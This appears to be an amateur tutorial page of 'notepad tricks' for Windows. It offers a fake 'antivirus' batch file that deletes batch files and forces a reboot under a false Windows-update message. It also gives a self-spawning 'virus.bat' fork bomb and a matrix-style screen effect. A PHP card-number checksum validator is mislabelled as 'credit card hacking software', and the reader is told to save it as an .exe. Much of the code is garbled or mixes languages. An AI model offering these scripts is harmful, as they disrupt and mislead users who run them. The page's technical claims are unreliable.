Now i am going to teach you How to make antivirus with notepad. Open Note pad Type the Following Codes. /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// x=msgbox("Anti-Virus should delete some of the virus's that you may have.",1+16 , "Alert") x=msgbox("what this does is removes anything that Has any text that seems like a virus",1+16 ,"Alert") x=msgbox("It will also go through your computer and delete All Batch Files.",1+16 ,"Alert") x=msgbox("If you want any of you .bat files saved then do so before hitting okay",1+16 ,"Alert") x=msgbox("The Anti-Virus software is now ready to begin. click okay to begin".1+16 ,"Alert") del (:'bat*): x=msgbox("All BAT Files sucessfully removed. click okay to Continue,",1+16 ,"Alert) del virus.vbs del virus.bat del torjan.bat del torjan.vbs del infected.bat del infected.vbs del TROJ.bat: del TOR.vbs del Torjan Horse Bat del Torjan Horse, vbs del OM.bat del OM.vbs del Macro Virus.bat del Micro Virus.vbs del conflicker.bat del conflicker.bat x=msgbox("Anti-Virus Completed...Will Now test and make working",1+16 ,"Alert) open notepad open mspaint open controlpanel open MyDocuments x=msgbox("Now we will Shutdown/Restart your computer, and windows will install an important update for your computer",1+16 ,"Alert) Shutdown -r -c "Rebooting computer for important windows updates" x=msgbox(anti-Virus Software Complete. The program now close.",1+16,;"Alert") /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// save it as Antivirus.bat

Now I am going to tell you How to make matrix effect At first Open Notepad and Type This. ------------------------------------------------------------------------------------------------------------- @echo off colour 2 :loop echo 01 0 1 011 0 1 01 00 1 11 0 1 11 0000 1 1 00 echo 00 11 0 11 0 11 1 1 00 10 1 0 11 11 0 10 00 10 1 echo 11 10 1 010101 11 0 11010 101011 0 1110101 echo 011 101 01110 10 1011101 010101 1 01 0 10 10 1 0 echo 001 11 10 1 101010 110 1100101 0 11010 1010 10 1 echo 011 110 10 10 1011110 110101 0101 0 10 1 01101 1 echo 110 010 11010 010 0 11 10 10 01 101010 010101 10 goto loop ------------------------------------------------------------------------------------------------------------ save it as matrix.bat ENJOY IT

                                                             WELCOME
Now I am going to tell you how to make credit card hacking software.
As Usual Open notepad and copy below text
************************************************************************************
{ $card_number=str_replace(' ', '', $card_number); if(ctype_digit($card_number)){ if( (strlen($card_number)%2)==0){ $i=0; } else{ $i=1; } $odd=get_odd_sum($card_number,$i); if( (strlen($card_number)%2)==0){ $i=1; } else{ $i=0; } $even=get_even_sum($card_number,$i); $combined_odd_even=$odd . $even; $final=add_numbers($combined_odd_even); if($final%10==0){ return(1); } else{ return(0); } } else { return(0); } } else { return(0); } } function get_odd_sum($card_number,$i){ $odd_sum=NULL; while(isset($card_number[$i])) { $odd_sum .= ($card_number[$i]*2); $i=$i+2; } return($odd_sum); } function get_even_sum($card_number,$i){ $even_sum=NULL; while(isset($card_number[$i])) { $even_sum .= $card_number[$i]; $i=$i+2; } return($even_sum); } function add_numbers($combined_odd_even){ $i=0;$final=0; while(isset($combined_odd_even[$i])){ $final=$final+$combined_odd_even[$i]; $i++; } return($final); } ////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////// /* CREDIT CARD TYPE */ ////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////// // CHECKS FOR MASTERCARD, VISA, DISCOVER, & AMERICAN EXPRESS // RETURNS Unknown IF NO MATCH IS FOUND function get_card_type($card_number){ // REFERENCE if(strlen($card_number)==16){ if($card_number[0].$card_number[1]>=51 && $card_number[0].$card_number[1]<=55){ return("Mastercard"); }else if($card_number[0]==4){ return("Visa"); }else if($card_number[0].$card_number[1].$card_number[2].$card_number[3]==6011){ return("Discover"); } }else if(strlen($card_number)==13){ if($card_number[0]==4){ return("Visa"); } }else if(strlen($card_number)==15){ if($card_number[0].$card_number[1]==34 $card_number[0].$card_number[1]==37){ return("American Express"); } } return("Unknown"); } ////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////// /* THIS IS THE START OF THE SCRIPT */ if(isset($_GET['card'])){ if(validate_creditcard($_GET['card'])){ echo "VALID CARD - TYPE: " . get_card_type($_GET['card']); }else{ echo "INVALID CARD"; } }
**************************************************************************************************************
Save it as card.exe and run it

What we can do with Computer We can use computer for Different purpose for example,Listening Music,Playing Games,Movie Making,Online Business etc. How to make virus? Most of the people have a problem with virus.

Today i will tell you How to Make Virus. First Click on Start Menu Then Select All Programs Go to Accessorise then click on note pad Another way to open notepad.

Go to Run type notepad and hit enter.

Here Are the codes for making virus(Below)

 ------------------------------------------------------------------------------------------------------------- Start Virus.bat virus.bat ------------------------------------------------------------------------------------------------------------- Go to top at File Click there and save it as save as(click on desktop give a name virus.bat)and save it "OPEN IT AT YOUR OWN RISK"